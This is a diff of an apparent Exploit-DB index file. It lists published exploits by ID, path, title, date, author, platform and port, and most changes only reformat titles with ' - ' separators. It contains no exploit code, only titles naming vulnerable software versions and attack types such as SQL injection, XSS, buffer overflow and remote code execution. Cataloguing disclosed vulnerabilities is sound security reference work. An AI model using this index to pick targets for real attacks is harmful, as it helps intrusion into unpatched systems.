22042,platforms/php/webapps/22042.php,"VBulletin 2.0.x/2.2.x members2.php Cross-Site Scripting",2002-11-25,Sp.IC,php,webapps,0 22043,platforms/php/webapps/22043.txt,"phpBB 2.0.3 Script Injection",2002-11-25,"Pete Foster",php,webapps,0 22044,platforms/php/webapps/22044.txt,"Web Server Creator Web Portal 0.1 - Remote File Include",2002-11-25,frog,php,webapps,0 @@ -20119,7 +20119,7 @@ id,file,description,date,author,platform,type,port 22877,platforms/php/webapps/22877.txt,"Yii Framework 1.1.8 - Search SQL Injection",2012-11-21,Juno_okyo,php,webapps,0 22878,platforms/windows/dos/22878.txt,"Adobe Reader 10.1.4 JP2KLib&CoolType Crash PoC",2012-11-21,coolkaveh,windows,dos,0 22879,platforms/windows/webapps/22879.txt,"ManageEngine ServiceDesk 8.0 - Multiple Vulnerabilities",2012-11-21,Vulnerability-Lab,windows,webapps,0 -23034,platforms/windows/remote/23034.txt,"Microsoft URLScan 2.5/ RSA Security SecurID 5.0 Configuration Enumeration Weakness",2003-08-14,"Andy Davis",windows,remote,0 +23034,platforms/windows/remote/23034.txt,"Microsoft URLScan 2.5/RSA Security SecurID 5.0 - Configuration Enumeration Weakness",2003-08-14,"Andy Davis",windows,remote,0 23035,platforms/asp/webapps/23035.txt,"Poster 2.0 - Unauthorized Privileged User Access",2003-08-15,DarkKnight,asp,webapps,0 23036,platforms/php/webapps/23036.txt,"MatrikzGB Guestbook 2.0 - Administrative Privilege Escalation",2003-08-16,"Stephan Sattler",php,webapps,0 23037,platforms/windows/local/23037.txt,"DWebPro 3.4.1 Http.ini Plaintext Password Storage",2003-08-18,rUgg1n3,windows,local,0 @@ -20467,7 +20467,7 @@ id,file,description,date,author,platform,type,port 23239,platforms/linux/dos/23239.c,"IRCnet IRCD 2.10 - Local Buffer Overflow",2003-10-13,millhouse,linux,dos,0 23240,platforms/windows/dos/23240.pl,"mIRC 6.1 DCC SEND Buffer Overflow (1)",2003-10-13,"Takara Takaishi",windows,dos,0 23241,platforms/windows/dos/23241.pl,"mIRC 6.1 DCC SEND Buffer Overflow (2)",2003-10-13,DarkAngel,windows,dos,0 -23242,platforms/windows/dos/23242.pl,"WinSyslog Interactive Syslog Server 4.21/ long Message Remote Denial of Service",2003-10-14,storm@securiteam.com,windows,dos,0 +23242,platforms/windows/dos/23242.pl,"WinSyslog Interactive Syslog Server 4.21 - long Message Remote Denial of Service",2003-10-14,storm@securiteam.com,windows,dos,0 23243,platforms/windows/remote/23243.py,"Free Float FTP Server USER Command Buffer Overflow",2012-12-09,D35m0nd142,windows,remote,0 23244,platforms/php/webapps/23244.txt,"WrenSoft Zoom Search Engine 2.0 Build: 1018 - Cross-Site Scripting",2003-10-14,Ezhilan,php,webapps,0 23245,platforms/linux/dos/23245.pl,"Apache Tomcat 4.0.x - Non-HTTP Request Denial of Service",2003-10-15,"Oliver Karow",linux,dos,0 @@ -21332,7 +21332,7 @@ id,file,description,date,author,platform,type,port 24140,platforms/hardware/remote/24140.txt,"Netgear RP114 3.26 Content Filter Bypass",2004-05-24,"Marc Ruef",hardware,remote,0 24141,platforms/linux/local/24141.txt,"cPanel 5-9 - Local Privilege Escalation",2004-05-24,"Rob Brown",linux,local,0 24142,platforms/windows/dos/24142.pl,"MollenSoft Lightweight FTP Server 3.6 - Remote Denial of Service",2004-05-24,storm,windows,dos,0 -24143,platforms/hardware/dos/24143.c,"VocalTec VGW120/ VGW480 Telephony Gateway Remote H.225 - Denial of Service",2004-05-24,Alexander,hardware,dos,0 +24143,platforms/hardware/dos/24143.c,"VocalTec VGW120/VGW480 Telephony Gateway Remote H.225 - Denial of Service",2004-05-24,Alexander,hardware,dos,0 24144,platforms/windows/dos/24144.txt,"MiniShare Server 1.3.2 - Remote Denial of Service",2004-05-26,"Donato Ferrante",windows,dos,0 24145,platforms/windows/dos/24145.c,"Orenosv HTTP/FTP Server 0.5.9 HTTP GET Denial of Service (1)",2004-05-25,badpack3t,windows,dos,0 24146,platforms/windows/dos/24146.bat,"Orenosv HTTP/FTP Server 0.5.9 HTTP GET Denial of Service (2)",2004-06-02,CoolICE,windows,dos,0 @@ -24107,7 +24107,7 @@ id,file,description,date,author,platform,type,port 26988,platforms/php/webapps/26988.txt,"Koobi 5.0 BBCode URL Tag Script Injection",2005-12-28,"kurdish hackers team",php,webapps,0 26989,platforms/php/webapps/26989.txt,"GMailSite 1.0.x - Cross-Site Scripting",2005-12-29,Lostmon,php,webapps,0 26990,platforms/php/webapps/26990.txt,"MyBB 1.0 Globa.php Cookie Data SQL Injection",2005-12-29,imei,php,webapps,0 -26991,platforms/asp/webapps/26991.html,"Web Wiz Multiple Products SQL Injection",2005-12-30,DevilBox,asp,webapps,0 +26991,platforms/asp/webapps/26991.html,"Web Wiz Multiple Products - SQL Injection",2005-12-30,DevilBox,asp,webapps,0 26992,platforms/php/webapps/26992.txt,"Ades Design AdesGuestbook 2.0 Read Script Cross-Site Scripting",2005-12-30,r0t3d3Vil,php,webapps,0 26993,platforms/php/webapps/26993.txt,"OOApp Guestbook 2.1 Home Script Cross-Site Scripting",2005-12-30,r0t3d3Vil,php,webapps,0 26994,platforms/php/webapps/26994.txt,"Kayako SupportSuite 3.0 0.26 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-30,r0t3d3Vil,php,webapps,0 @@ -24565,7 +24565,7 @@ id,file,description,date,author,platform,type,port 27457,platforms/cfm/webapps/27457.txt,"1WebCalendar 4.0 - mainCal.cfm SQL Injection",2006-03-22,r0t3d3Vil,cfm,webapps,0 27458,platforms/php/webapps/27458.txt,"EasyMoblog 0.5 Img.php Cross-Site Scripting",2006-03-23,FarhadKey,php,webapps,0 27459,platforms/php/webapps/27459.txt,"CoMoblog 1.0 Img.php Cross-Site Scripting",2006-03-23,FarhadKey,php,webapps,0 -27460,platforms/multiple/dos/27460.pl,"RealNetworks Multiple Products Multiple Buffer Overflow Vulnerabilities",2006-03-23,"Federico L. Bossi Bonin",multiple,dos,0 +27460,platforms/multiple/dos/27460.pl,"RealNetworks Multiple Products - Multiple Buffer Overflow Vulnerabilities",2006-03-23,"Federico L. Bossi Bonin",multiple,dos,0 27461,platforms/linux/local/27461.c,"Linux Kernel 2.4.x/2.5.x/2.6.x - Sockaddr_In.Sin_Zero Kernel Memory Disclosure Vulnerabilities",2006-03-23,"Pavel Kankovsky",linux,local,0 27462,platforms/php/webapps/27462.txt,"AdMan 1.0.20051221 ViewStatement.php SQL Injection",2003-03-23,r0t,php,webapps,0 27463,platforms/jsp/webapps/27463.txt,"IBM Tivoli Business Systems Manager 3.1 APWC_Win_Main.JSP Cross-Site Scripting",2006-03-23,anonymous,jsp,webapps,0 @@ -25306,7 +25306,7 @@ id,file,description,date,author,platform,type,port 28247,platforms/php/webapps/28247.txt,"IDevSpot PHPLinkExchange 1.0 Index.php Remote File Include",2006-07-20,r0t,php,webapps,0 28248,platforms/php/webapps/28248.txt,"IDevSpot PHPHostBot 1.0 Index.php Remote File Include",2006-07-20,r0t,php,webapps,0 28249,platforms/php/webapps/28249.txt,"GeoAuctions 1.0.6 Enterprise index.php d Parameter SQL Injection",2006-07-20,LBDT,php,webapps,0 -28250,platforms/php/webapps/28250.txt,"Geodesic Solutions Multiple Products index.php b Parameter SQL Injection",2006-07-20,LBDT,php,webapps,0 +28250,platforms/php/webapps/28250.txt,"Geodesic Solutions Multiple Products - index.php b Parameter SQL Injection",2006-07-20,LBDT,php,webapps,0 28251,platforms/php/webapps/28251.txt,"MiniBB 1.5 News.php Remote File Include",2006-07-20,AG-Spider,php,webapps,0 28252,platforms/windows/dos/28252.txt,"Microsoft Internet Explorer 6.0 String To Binary Function Denial of Service",2006-07-20,hdm,windows,dos,0 28253,platforms/php/webapps/28253.txt,"Advanced Poll 2.0.2 Common.Inc.php Remote File Include",2006-07-21,Solpot,php,webapps,0 @@ -25389,7 +25389,7 @@ id,file,description,date,author,platform,type,port 28333,platforms/unix/remote/28333.rb,"D-Link Devices UPnP SOAP Telnetd Command Execution",2013-09-17,Metasploit,unix,remote,49152 28334,platforms/linux/remote/28334.rb,"Sophos Web Protection Appliance sblistpack Arbitrary Command Execution",2013-09-17,Metasploit,linux,remote,443 28335,platforms/windows/local/28335.rb,"Agnitum Outpost Internet Security Local Privilege Escalation",2013-09-17,Metasploit,windows,local,0 -28336,platforms/windows/remote/28336.rb,"HP ProCurve Manager SNAC UpdateDomainControllerServlet File Upload",2013-09-17,Metasploit,windows,remote,443 +28336,platforms/windows/remote/28336.rb,"HP ProCurve Manager - SNAC UpdateDomainControllerServlet File Upload",2013-09-17,Metasploit,windows,remote,443 28337,platforms/windows/remote/28337.rb,"HP ProCurve Manager SNAC UpdateCertificatesServlet File Upload",2013-09-17,Metasploit,windows,remote,443 28338,platforms/linux/dos/28338.txt,"Vino VNC Server 3.7.3 - Persistent Denial of Service",2013-09-17,"Trustwave's SpiderLabs",linux,dos,5900 28339,platforms/asp/webapps/28339.txt,"Anychart 3.0 Password Parameter SQL Injection",2006-08-03,sCORPINo,asp,webapps,0 @@ -25411,7 +25411,7 @@ id,file,description,date,author,platform,type,port 28355,platforms/php/webapps/28355.txt,"VWar 1.5 news.php vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 28356,platforms/php/webapps/28356.txt,"VWar 1.5 stats.php vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 28357,platforms/windows/remote/28357.asc,"Microsoft Windows Explorer 2000/2003/XP Drag and Drop Remote Code Execution",2006-07-27,"Plebo Aesdi Nael",windows,remote,0 -28358,platforms/linux/dos/28358.txt,"Linux Kernel 2.6.x (<= 2.6.17.7) - NFS and EXT3 Combination Remote Denial of Service",2006-08-07,"James McKenzie",linux,dos,0 +28358,platforms/linux/dos/28358.txt,"Linux Kernel <= 2.6.17.7 - NFS and EXT3 Combination Remote Denial of Service",2006-08-07,"James McKenzie",linux,dos,0 28359,platforms/php/webapps/28359.txt,"PHPPrintAnalyzer 1.1 Index.php Remote File Include",2006-08-07,sh3ll,php,webapps,0 28360,platforms/windows/remote/28360.c,"EasyCafe 2.1/2.2 Security Restriction Bypass",2006-08-07,"Mobin Yazarlou",windows,remote,0 28361,platforms/multiple/dos/28361.c,"Festalon 0.5 HES Files Remote Heap Buffer Overflow",2006-08-07,"Luigi Auriemma",multiple,dos,0 @@ -25475,7 +25475,7 @@ id,file,description,date,author,platform,type,port 28421,platforms/windows/dos/28421.htm,"Microsoft Internet Explorer 6.0 - Multiple COM Object Color Property Denial of Service Vulnerabilities",2006-08-21,XSec,windows,dos,0 28422,platforms/php/webapps/28422.txt,"DieselScripts Diesel Paid Mail Getad.php Cross-Site Scripting",2006-08-21,night_warrior771,php,webapps,0 28423,platforms/php/webapps/28423.txt,"RedBlog 0.5 Index.php Remote File Include",2006-08-22,Root3r_H3ll,php,webapps,0 -28424,platforms/linux/remote/28424.txt,"Apache HTTP Server (<= 1.3.35 / <= 2.0.58 / <= 2.2.2) - Arbitrary HTTP Request Headers Security Weakness",2006-08-24,"Thiago Zaninotti",linux,remote,0 +28424,platforms/linux/remote/28424.txt,"Apache HTTP Server <= 1.3.35 / <= 2.0.58 / <= 2.2.2 - Arbitrary HTTP Request Headers Security Weakness",2006-08-24,"Thiago Zaninotti",linux,remote,0 28425,platforms/solaris/local/28425.txt,"Sun Solaris 8/9 UCB/PS Command Local Information Disclosure",2006-03-27,anonymous,solaris,local,0 28426,platforms/php/webapps/28426.txt,"Headline Portal Engine 0.x/1.0 HPEInc Parameter Multiple Remote File Include Vulnerabilities",2006-08-21,"the master",php,webapps,0 28427,platforms/novell/local/28427.pl,"Novell Identity Manager Arbitrary Command Execution",2006-08-18,anonymous,novell,local,0 @@ -25635,7 +25635,7 @@ id,file,description,date,author,platform,type,port 28585,platforms/php/webapps/28585.txt,"Jupiter CMS 1.1.4/1.1.5 modules/search.php Multiple Parameter XSS",2006-09-15,"HACKERS PAL",php,webapps,0 28586,platforms/php/webapps/28586.txt,"Jupiter CMS 1.1.4/1.1.5 modules/register Multiple Parameter SQL Injection",2006-09-15,"HACKERS PAL",php,webapps,0 28587,platforms/asp/webapps/28587.txt,"EasyPage 7 Default.ASPX SQL Injection",2006-09-15,s3rv3r_hack3r,asp,webapps,0 -28588,platforms/windows/dos/28588.txt,"Symantec Multiple Products SymEvent Driver Local Denial of Service",2006-09-15,"David Matousek",windows,dos,0 +28588,platforms/windows/dos/28588.txt,"Symantec Multiple Products - SymEvent Driver Local Denial of Service",2006-09-15,"David Matousek",windows,dos,0 28589,platforms/asp/webapps/28589.txt,"Web Wiz Forums 7.01 Members.ASP Cross-Site Scripting",2006-09-15,Crack_MaN,asp,webapps,0 28590,platforms/php/webapps/28590.txt,"Hitweb 3.0 REP_CLASS Multiple Remote File Include Vulnerabilities",2006-09-16,ERNE,php,webapps,0 28591,platforms/php/webapps/28591.php,"PHP-post Web Forum 0.x.1.0 profile.php Multiple Parameter SQL Injection",2006-09-16,"HACKERS PAL",php,webapps,0 @@ -25695,7 +25695,7 @@ id,file,description,date,author,platform,type,port 28645,platforms/php/webapps/28645.txt,"CakePHP 1.1.7.3363 Vendors.php Directory Traversal",2006-09-22,"James Bercegay",php,webapps,0 28646,platforms/php/webapps/28646.txt,"mysource 2.14.8/2.16 - Multiple Vulnerabilities",2006-09-22,"Patrick Webster",php,webapps,0 28647,platforms/php/webapps/28647.txt,"PLESK 7.5/7.6 - Filemanager.php Directory Traversal",2006-09-22,GuanYu,php,webapps,0 -28648,platforms/freebsd/dos/28648.c,"FreeBSD 5.x I386_Set_LDT() Multiple Local Denial of Service Vulnerabilities",2006-09-23,"Adriano Lima",freebsd,dos,0 +28648,platforms/freebsd/dos/28648.c,"FreeBSD 5.x I386_Set_LDT() - Multiple Local Denial of Service Vulnerabilities",2006-09-23,"Adriano Lima",freebsd,dos,0 28649,platforms/hardware/webapps/28649.txt,"Tenda W309R Router 5.07.46 - Configuration Disclosure",2013-09-30,SANTHO,hardware,webapps,0 28650,platforms/windows/dos/28650.py,"KMPlayer 3.7.0.109 - (.wav) Crash PoC",2013-09-30,xboz,windows,dos,0 28695,platforms/php/webapps/28695.txt,"CubeCart 3.0.x admin/forgot_pass.php user_name Parameter SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0 @@ -26294,7 +26294,7 @@ id,file,description,date,author,platform,type,port 29287,platforms/windows/dos/29287.txt,"Multiple Vendor Firewall HIPS Process Spoofing",2006-12-15,"Matousec Transparent security",windows,dos,0 29288,platforms/asp/webapps/29288.txt,"Omniture SiteCatalyst Multiple Cross-Site Scripting Vulnerabilities",2006-12-16,"Hackers Center Security",asp,webapps,0 29289,platforms/php/webapps/29289.php,"eXtreme-fusion 4.02 Fusion_Forum_View.php Local File Include",2006-12-16,Kacper,php,webapps,0 -29290,platforms/php/remote/29290.c,"Apache + PHP 5.x (< 5.3.12 & < 5.4.2) - cgi-bin Remote Code Execution Exploit",2013-10-29,kingcope,php,remote,80 +29290,platforms/php/remote/29290.c,"Apache + PHP < 5.3.12 & < 5.4.2 - cgi-bin Remote Code Execution Exploit",2013-10-29,kingcope,php,remote,80 29293,platforms/asp/webapps/29293.txt,"Contra Haber Sistemi 1.0 Haber.ASP SQL Injection",2006-12-16,ShaFuck31,asp,webapps,0 29294,platforms/php/webapps/29294.html,"Knusperleicht Shoutbox 2.6 Shout.php HTML Injection",2006-12-18,IMHOT3B,php,webapps,0 29295,platforms/windows/dos/29295.html,"Microsoft Outlook ActiveX Control Remote Internet Explorer Denial of Service",2006-12-18,shinnai,windows,dos,0 @@ -26318,7 +26318,7 @@ id,file,description,date,author,platform,type,port 29312,platforms/hardware/webapps/29312.txt,"Unicorn Router WB-3300NR CSRF (Factory Reset/DNS Change)",2013-10-30,absane,hardware,webapps,0 29313,platforms/php/webapps/29313.txt,"Xt-News 0.1 show_news.php id_news Parameter XSS",2006-12-22,Mr_KaLiMaN,php,webapps,0 29314,platforms/php/webapps/29314.txt,"Xt-News 0.1 show_news.php id_news Parameter SQL Injection",2006-12-22,Mr_KaLiMaN,php,webapps,0 -29316,platforms/php/remote/29316.py,"Apache + PHP 5.x (< 5.3.12 & < 5.4.2) - Remote Code Execution (Multithreaded Scanner)",2013-10-31,noptrix,php,remote,0 +29316,platforms/php/remote/29316.py,"Apache + PHP < 5.3.12 & < 5.4.2 - Remote Code Execution (Multithreaded Scanner)",2013-10-31,noptrix,php,remote,0 29994,platforms/php/webapps/29994.txt,"Campsite 2.6.1 - Template.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 29995,platforms/php/webapps/29995.txt,"Campsite 2.6.1 - TimeUnit.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 29318,platforms/php/webapps/29318.txt,"ImpressPages CMS 3.6 - Multiple XSS/SQLi Vulnerabilities",2013-10-31,LiquidWorm,php,webapps,0 @@ -26539,7 +26539,7 @@ id,file,description,date,author,platform,type,port 30019,platforms/windows/remote/30019.c,"CA Multiple Products Console Server and InoCore.dll - Remote Code Execution Vulnerabilities",2007-05-09,binagres,windows,remote,0 30020,platforms/linux/dos/30020.txt,"MySQL 5.0.x - IF Query Handling Remote Denial of Service",2013-12-04,"Neil Kettle",linux,dos,0 30021,platforms/solaris/local/30021.txt,"Sun Microsystems Solaris SRSEXEC 3.2.x - Arbitrary File Read Local Information Disclosure",2007-05-10,anonymous,solaris,local,0 -30022,platforms/php/webapps/30022.txt,"PHP Multi User Randomizer 2006.09.13 Configure_Plugin.TPL.php Cross-Site Scripting",2007-05-10,the_Edit0r,php,webapps,0 +30022,platforms/php/webapps/30022.txt,"PHP Multi User Randomizer 2006.09.13 - Configure_Plugin.TPL.php Cross-Site Scripting",2007-05-10,the_Edit0r,php,webapps,0 30023,platforms/windows/dos/30023.txt,"Progress OpenEdge 10 b - Multiple Denial of Service Vulnerabilities",2007-05-11,"Eelko Neven",windows,dos,0 30024,platforms/linux/dos/30024.txt,"LibEXIF 0.6.x - Exif_Data_Load_Data_Entry Remote Integer Overflow",2007-05-11,"Victor Stinner",linux,dos,0 30025,platforms/multiple/remote/30025.txt,"TeamSpeak Server 2.0.23 - Multiple Scripts Multiple Cross-Site Scripting Vulnerabilities",2007-05-11,"Gilberto Ficara",multiple,remote,0 @@ -26910,7 +26910,7 @@ id,file,description,date,author,platform,type,port 29807,platforms/php/remote/29807.php,"PHP <= 5.1.6 Imap_Mail_Compose() Function Buffer Overflow",2007-03-31,"Stefan Esser",php,remote,0 29808,platforms/php/remote/29808.php,"PHP <= 5.1.6 - Msg_Receive() Memory Allocation Integer Overflow",2007-03-31,"Stefan Esser",php,remote,0 29809,platforms/linux/dos/29809.txt,"PulseAudio 0.9.5 Assert() Remote Denial of Service",2007-04-02,"Luigi Auriemma",linux,dos,0 -29810,platforms/windows/dos/29810.c,"Symantec Multiple Products SPBBCDrv Driver Local Denial of Service",2007-04-01,"David Matousek",windows,dos,0 +29810,platforms/windows/dos/29810.c,"Symantec Multiple Products - SPBBCDrv Driver Local Denial of Service",2007-04-01,"David Matousek",windows,dos,0 29813,platforms/windows/dos/29813.py,"Microsoft Windows Vista ARP Table Entries Denial of Service",2004-04-02,"Kristian Hermansen",windows,dos,0 29814,platforms/windows/remote/29814.txt,"NextPage LivePublish 2.02 LPEXT.DLL Cross-Site Scripting",2007-04-03,"Igor Monteiro Vieira",windows,remote,0 29815,platforms/hardware/remote/29815.rb,"NETGEAR ReadyNAS Perl Code Evaluation",2013-11-25,Metasploit,hardware,remote,443 @@ -26966,9 +26966,9 @@ id,file,description,date,author,platform,type,port 29867,platforms/windows/dos/29867.xml,"NetSprint Ask IE Toolbar 1.1 - Multiple Denial of Service Vulnerabilities",2007-04-17,"Michal Bucko",windows,dos,0 29868,platforms/php/webapps/29868.txt,"NuclearBB Alpha 1 - Multiple SQL Injection Vulnerabilities",2007-04-18,"John Martinelli",php,webapps,0 29869,platforms/php/webapps/29869.php,"Fully Modded PHPBB2 PHPBB_Root_Path Remote File Include",2007-04-19,"HACKERS PAL",php,webapps,0 -29870,platforms/php/webapps/29870.txt,"Exponent CMS 0.96.5/ 0.96.6 magpie_debug.php url Parameter XSS",2007-04-20,"Hamid Ebadi",php,webapps,0 -29871,platforms/php/webapps/29871.txt,"Exponent CMS 0.96.5/ 0.96.6 magpie_slashbox.php rss_url Parameter XSS",2007-04-20,"Hamid Ebadi",php,webapps,0 -29872,platforms/php/webapps/29872.txt,"Exponent CMS 0.96.5/ 0.96.6 iconspopup.php icodir Variable Traversal Arbitrary Directory Listing",2007-04-20,"Hamid Ebadi",php,webapps,0 +29870,platforms/php/webapps/29870.txt,"Exponent CMS 0.96.5/0.96.6 - magpie_debug.php url Parameter XSS",2007-04-20,"Hamid Ebadi",php,webapps,0 +29871,platforms/php/webapps/29871.txt,"Exponent CMS 0.96.5/0.96.6 - magpie_slashbox.php rss_url Parameter XSS",2007-04-20,"Hamid Ebadi",php,webapps,0 +29872,platforms/php/webapps/29872.txt,"Exponent CMS 0.96.5/0.96.6 - iconspopup.php icodir Variable Traversal Arbitrary Directory Listing",2007-04-20,"Hamid Ebadi",php,webapps,0 29873,platforms/multiple/remote/29873.php,"FreePBX 2.2 - SIP Packet Multiple HTML Injection Vulnerabilities",2007-04-20,XenoMuta,multiple,remote,0 29874,platforms/php/webapps/29874.txt,"PHP Turbulence 0.0.1 Turbulence.php Remote File Include",2007-04-20,Omni,php,webapps,0 29875,platforms/multiple/dos/29875.py,"AMSN 0.96 - Malformed Message Denial of Service",2007-04-21,"Levent Kayan",multiple,dos,0 @@ -27980,7 +27980,7 @@ id,file,description,date,author,platform,type,port 31095,platforms/novell/remote/31095.txt,"Novell GroupWise 5.57e/6.5.7/7.0 WebAccess Multiple Cross-Site Scripting Vulnerabilities",2008-01-31,"Frederic Loudet",novell,remote,0 31096,platforms/php/webapps/31096.txt,"WordPress Plugin ShiftThis Newsletter - SQL Injection",2008-02-03,S@BUN,php,webapps,0 31097,platforms/php/webapps/31097.txt,"CruxCMS 3.0 - 'search.php' Cross-Site Scripting",2008-02-04,Psiczn,php,webapps,0 -31098,platforms/php/webapps/31098.txt,"Simple OS CMS 0.1c_beta 'login.php' SQL Injection",2008-02-04,Psiczn,php,webapps,0 +31098,platforms/php/webapps/31098.txt,"Simple OS CMS 0.1c_beta - 'login.php' SQL Injection",2008-02-04,Psiczn,php,webapps,0 31099,platforms/php/webapps/31099.txt,"Codice CMS 'login.php' SQL Injection",2008-02-04,Psiczn,php,webapps,0 31100,platforms/multiple/dos/31100.txt,"Anon Proxy Server 0.100/0.102 - Remote Authentication Buffer Overflow",2008-02-04,L4teral,multiple,dos,0 31101,platforms/php/webapps/31101.txt,"HispaH Youtube Clone 'load_message.php' Cross-Site Scripting",2008-02-04,Smasher,php,webapps,0 @@ -28128,8 +28128,8 @@ id,file,description,date,author,platform,type,port 31230,platforms/php/webapps/31230.txt,"WordPress wp-people Plugin 2.0 - 'wp-people-popup.php' SQL Injection",2008-02-18,S@BUN,php,webapps,0 31231,platforms/windows/remote/31231.txt,"SIMM-Comm SCI Photo Chat 3.4.9 - Directory Traversal",2008-02-19,"Luigi Auriemma",windows,remote,0 31232,platforms/multiple/dos/31232.txt,"Foxit WAC Remote Access Server 2.0 Build 3503 - Heap Buffer Overflow",2008-02-16,"Luigi Auriemma",multiple,dos,0 -31233,platforms/multiple/webapps/31233.txt,"WebcamXP 3.72.440/4.05.280 beta /pocketpc camnum Variable Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",multiple,webapps,0 -31234,platforms/multiple/webapps/31234.txt,"WebcamXP 3.72.440/4.05.280 beta /show_gallery_pic id Variable Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",multiple,webapps,0 +31233,platforms/multiple/webapps/31233.txt,"WebcamXP 3.72.440/4.05.280 beta - /pocketpc camnum Variable Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",multiple,webapps,0 +31234,platforms/multiple/webapps/31234.txt,"WebcamXP 3.72.440/4.05.280 beta - /show_gallery_pic id Variable Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",multiple,webapps,0 31235,platforms/php/webapps/31235.txt,"Jinzora 2.7.5 index.php Multiple Parameter XSS",2008-02-19,"Alexandr Polyakov",php,webapps,0 31236,platforms/php/webapps/31236.txt,"Jinzora 2.7.5 ajax_request.php Multiple Parameter XSS",2008-02-19,"Alexandr Polyakov",php,webapps,0 31237,platforms/php/webapps/31237.txt,"Jinzora 2.7.5 slim.php Multiple Parameter XSS",2008-02-19,"Alexandr Polyakov",php,webapps,0 @@ -28491,7 +28491,7 @@ id,file,description,date,author,platform,type,port 31627,platforms/unix/dos/31627.c,"LICQ <= 1.3.5 - File Descriptor Remote Denial of Service",2008-04-08,"Milen Rangelov",unix,dos,0 31628,platforms/php/webapps/31628.txt,"Swiki 1.5 - HTML Injection and Cross-Site Scripting Vulnerabilities",2008-04-08,"Brad Antoniewicz",php,webapps,0 31629,platforms/windows/dos/31629.txt,"HP OpenView Network Node Manager 7.x - 'ovspmd' Buffer Overflow",2008-04-08,"Luigi Auriemma",windows,dos,0 -31630,platforms/linux/remote/31630.txt,"Adobe Flash Player 8/ 9.0.x - SWF File 'DeclareFunction2' ActionScript Tag Remote Code Execution",2008-04-08,"Javier Vicente Vallejo",linux,remote,0 +31630,platforms/linux/remote/31630.txt,"Adobe Flash Player 8/9.0.x - SWF File 'DeclareFunction2' ActionScript Tag Remote Code Execution",2008-04-08,"Javier Vicente Vallejo",linux,remote,0 31631,platforms/php/webapps/31631.txt,"Pragmatic Utopia PU Arcade <= 2.2 - 'gid' Parameter SQL Injection",2008-04-09,MantiS,php,webapps,0 31632,platforms/windows/remote/31632.txt,"Microsoft SharePoint Server 2.0 Picture Source HTML Injection",2008-04-09,OneIdBeagl3,windows,remote,0 31633,platforms/php/webapps/31633.html,"phpBB Fishing Cat Portal Addon - 'functions_portal.php' Remote File Include",2008-04-09,bd0rk,php,webapps,0 @@ -28819,7 +28819,7 @@ id,file,description,date,author,platform,type,port 31967,platforms/asp/webapps/31967.txt,"Commtouch Anti-Spam Enterprise Gateway 'PARAMS' Parameter Cross-Site Scripting",2008-06-26,"Erez Metula",asp,webapps,0 31968,platforms/linux/dos/31968.txt,"GNOME Rhythmbox 0.11.5 Malformed Playlist File Denial Of Service",2008-06-26,"Juan Pablo Lopez Yacubian",linux,dos,0 32135,platforms/php/webapps/32135.txt,"common solutions csphonebook 1.02 - 'index.php' Cross-Site Scripting",2008-07-31,"Ghost Hacker",php,webapps,0 -32046,platforms/jsp/webapps/32046.txt,"IBM Maximo 4.1/ 5.2 - 'debug.jsp' HTML Injection And Information Disclosure Vulnerabilities",2008-07-11,"Deniz Cevik",jsp,webapps,0 +32046,platforms/jsp/webapps/32046.txt,"IBM Maximo 4.1/5.2 - 'debug.jsp' HTML Injection And Information Disclosure Vulnerabilities",2008-07-11,"Deniz Cevik",jsp,webapps,0 32047,platforms/php/webapps/32047.txt,"Hudson 1.223 - 'q' Parameter Cross-Site Scripting",2008-07-11,syniack,php,webapps,0 32048,platforms/osx/remote/32048.html,"Apple iPhone and iPod Touch < 2.0 - Multiple Remote Vulnerabilities",2008-07-11,"Hiromitsu Takagi",osx,remote,0 31970,platforms/php/webapps/31970.txt,"PHP-CMDB 0.7.3 - Multiple Vulnerabilities",2014-02-28,HauntIT,php,webapps,80 @@ -30314,7 +30314,7 @@ id,file,description,date,author,platform,type,port 33633,platforms/windows/webapps/33633.txt,"IPSwitch IMail Server WEB client 12.4 persistent XSS",2014-06-03,Peru,windows,webapps,0 33644,platforms/php/webapps/33644.txt,"Basic-CMS 'nav_id' Parameter Cross-Site Scripting",2010-02-12,Red-D3v1L,php,webapps,0 33641,platforms/php/webapps/33641.txt,"Joomla! F!BB Component 1.5.96 RC SQL Injection and HTML Injection Vulnerabilities",2009-09-17,"Jeff Channell",php,webapps,0 -33642,platforms/windows/remote/33642.html,"Symantec Multiple Products Client Proxy ActiveX (CLIproxy.dll) Remote Overflow",2010-02-17,"Alexander Polyakov",windows,remote,0 +33642,platforms/windows/remote/33642.html,"Symantec Multiple Products - Client Proxy ActiveX (CLIproxy.dll) Remote Overflow",2010-02-17,"Alexander Polyakov",windows,remote,0 33643,platforms/php/webapps/33643.txt,"CMS Made Simple 1.6.6 - Local File Include and Cross-Site Scripting Vulnerabilities",2010-02-12,"Beenu Arora",php,webapps,0 33647,platforms/asp/webapps/33647.txt,"Portrait Software Portrait Campaign Manager 4.6.1.22 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-16,"Roel Schouten",asp,webapps,0 33648,platforms/hardware/remote/33648.txt,"Huawei HG510 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-02-16,"Ivan Markovic",hardware,remote,0 @@ -31203,7 +31203,7 @@ id,file,description,date,author,platform,type,port 34643,platforms/php/webapps/34643.txt,"Silurus Classifieds category.php ID Parameter XSS",2009-08-06,Moudi,php,webapps,0 34644,platforms/php/webapps/34644.txt,"Silurus Classifieds wcategory.php ID Parameter XSS",2009-08-06,Moudi,php,webapps,0 34645,platforms/php/webapps/34645.txt,"Silurus Classifieds search.php keywords Parameter XSS",2009-08-06,Moudi,php,webapps,0 -34646,platforms/php/webapps/34646.txt,"Blog Ink (Blink) Multiple SQL Injection Vulnerabilities",2009-08-03,Drosophila,php,webapps,0 +34646,platforms/php/webapps/34646.txt,"Blog Ink (Blink) - Multiple SQL Injection Vulnerabilities",2009-08-03,Drosophila,php,webapps,0 34647,platforms/windows/remote/34647.txt,"Ammyy Admin 3.5 - RCE",2014-09-13,scriptjunkie,windows,remote,0 34648,platforms/windows/local/34648.txt,"Comodo Internet Security - HIPS/Sandbox Escape 